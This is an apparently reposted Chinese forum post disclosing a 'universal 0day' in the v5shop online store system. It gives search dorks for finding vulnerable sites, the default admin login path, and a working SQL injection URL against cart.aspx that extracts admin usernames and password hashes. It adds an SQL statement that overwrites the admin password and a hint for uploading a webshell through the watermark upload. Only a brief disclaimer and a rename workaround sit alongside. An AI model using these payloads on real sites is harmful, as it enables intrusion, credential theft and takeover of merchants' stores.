【Oday】v5shop网上商城系统通杀oday

admin 2021年4月3日19:06:19评论61 views字数 1300阅读4分20秒阅读模式

v5shop 网上商城系统通杀oday

关键字:services.aspxid=
inurl:scoreindex.aspx
官网测试已被和谐 !
漏洞危害:高危
官网网站:www.v5shop.com.cn

默认后台地址:weblogin/Login.aspx

以下是测试EXP:

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

weblogin/System_Config_Operate.aspx
系统设置-
参数设置-
后台上传水印.貌似可以直接上传大马.
哪位大牛去试试
UploadFile/Picture/

漏洞文件:cart.aspx   
结算中心的文件

exp
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

针对有些MD5破不出的 更新下管理员密码:SQL语句
update web_admin set pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042004400450037004400450041003600340042003700430037004300

至于是不是通杀,有兴趣的测试一下, 最新版本通杀,种种迹象表现,官方也被和谐啦,lol,临时修复方法,把cart.aspx临时改名,今天人品爆啦,写了好长时间的文档,没存档,sleepy本来放出来漏洞利用工具,暂时先这样吧,请大家用于学习,勿用于非法用途!(只在红盟放出 在红盟群里发了 没想到有人连教程都出了 操)

文章来源于lcx.cc:【Oday】v5shop网上商城系统通杀oday

相关推荐: LuManager 2.0.99 渗透成功一次 开贴庆祝

LuManager 2.0.99 渗透成功一次 开贴庆祝 江南的鱼 | 2013-12-25 12:54 有个目标服务器 是 LuManager 2.0.99,服务器上就一个网站,久拿不下。 昨天平安夜,插入XSS,请友人 发入侵修改图【假的入侵图】给 网站客…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:06:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Oday】v5shop网上商城系统通杀odayhttp://cn-sec.com/archives/319931.html

发表评论

匿名网友 填写信息